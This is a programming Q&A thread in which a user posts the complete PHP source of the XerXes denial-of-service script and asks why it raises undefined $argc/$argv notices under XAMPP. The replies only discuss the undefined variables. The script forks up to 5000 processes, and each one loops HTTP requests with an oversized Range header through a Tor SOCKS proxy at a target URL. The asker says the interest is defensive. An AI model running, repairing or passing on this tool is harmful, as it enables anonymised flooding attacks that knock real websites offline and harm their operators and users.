# Notice: Undefined variable: argc in C:\xampp\htdocs\XerXes.php on line 73 Notice: Undefined variable: argv in C:\xampp\htdocs\XerXes.php on line 73

Tags: dos, argv, ddos, argc

I have recently gotten into DOS attack scripts (How to use them and how to defend from them) and picked up this one called XerXes. I noticed that this has been coded in two different languages .c and .php and I have both. I can get the .c one to work perfectly but not the .php one as I get this error :

Notice: Undefined variable: argc in C:\xampp\htdocs\XerXes.php on line 73

Notice: Undefined variable: argv in C:\xampp\htdocs\XerXes.php on line 73

Here is the script:

```
<?php
function usage($argv) {
print "Usage: php ./{$argv[0]} <number of processes> <url>\n";
die();
}

function head($url) {
while(true) {

    $header[]     = "Connection: keep-alive";
    $header[]    = "Transfer-Encoding: chunked";
    $header[]    = "Range: bytes=0-,<SNIP>,1-1299";   //Sniped for site because it is BIG
    $header[]    = "Accept-Encoding: gzip, deflate, compress";

    $ch         = curl_init(); 
    curl_setopt($ch, CURLOPT_URL, $url); 
    curl_setopt($ch, CURLOPT_NOBODY, true);
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
    curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
    curl_setopt($ch, CURLOPT_VERBOSE, true);
    curl_setopt($ch, CURLOPT_HEADER, true);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);     
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, false);
    curl_setopt($ch, CURLINFO_HEADER_OUT, false);
    curl_setopt($ch, CURLOPT_PROXY, "127.0.0.1:9050");
    curl_setopt($ch, CURLOPT_PROXYTYPE, CURLPROXY_SOCKS5);
    curl_setopt($ch, CURLOPT_HTTPHEADER, $header);
    while(true) {
        echo '.';
        curl_setopt($ch, CURLOPT_USERAGENT, "XerXeS Attack Platform - 0wn3d bitch. TANGO DOWN (+http://th3j35t3r.wordpress.com/)");
        curl_exec($ch);    
    }        
    curl_close($ch);
}
}

function main($argc, $argv) {

$status = 1;

if ($argc < 3) {
  usage($argv);
}

if($argv[1] > 5001) {
    echo "MAX OF 5000 threads\n\n";
    die();
}

$pids = Array();
echo "URL: ".$argv[2]."\n";
for ($i = 0; $i < $argv[1]; $i++) {
  $pid = pcntl_fork();

  if ($pid == -1) {
die("ERROR");
  }
  else if ($pid == 0) {
        head($argv[2]);
     exit(0);
  }
  else {
$pids[] = $pid;
      }
    }

foreach ($pids as $pid) {
  pcntl_waitpid($pid, $status);
}

}

main($argc, $argv);  //Errors :(
?>
```

Any help to resolve this error is appreciated.

PLEASE NOTE: I do not use these codes for attacking servers other than my own for security purposes and how to defend against them. I DO NOT RECOMMEND ANY ONE DDOSing or DOSing.

Answer (score 0):

You never define these two variables. What are you trying to pass to `main()` function?

Comment: Like I said in the post I picked it up. I am not the creator of this but I am trying to get this to work so I can learn how to defend from this.

Comment: You asked where the error comes from, I answered. I don't know the big picture you are looking at and what those arguments really mean.

Comment: I didn't ask for where the error comes from as I have the errors and they come from line 73 and looking back in the script argc starts on line 41 and it's usage is argv on line 42 and argv starts on line 45.
But as I said in the post, Any help is appreciated so thank you.

Comment: Mate, these variables are not defined. What is the expected outcome of main($argc, $argv)? Does main(1,2) give error? I suppose not (or at least a different one)...

Comment: They are the only errors which it gives me. Maby you could try to run that .php? I am not sure what the outcome of main($argc, $argv) is suppose to be.

Comment: I'm not sure any more what are we talking about here. You have a function. You pass some arguments to it. These arguments must be defined. I.e., $argc = 1; $argv = array(1,3) - I guess $argv is array... Otherwise you are passing something which doesn't exist.

Comment: I guess that they aren't defined. Could you maby tell me what to change? I have next to 0 experience in .php. I am sorry if I am a bovver to you.

Comment: Mate, I have not a slightest idea what these parameters should be. My understanding is that this file just defines these functions which are meant to be used somewhere else. If you have some other files, you can try to find out which arguments are passed there. Otherwise it is impossible to guess.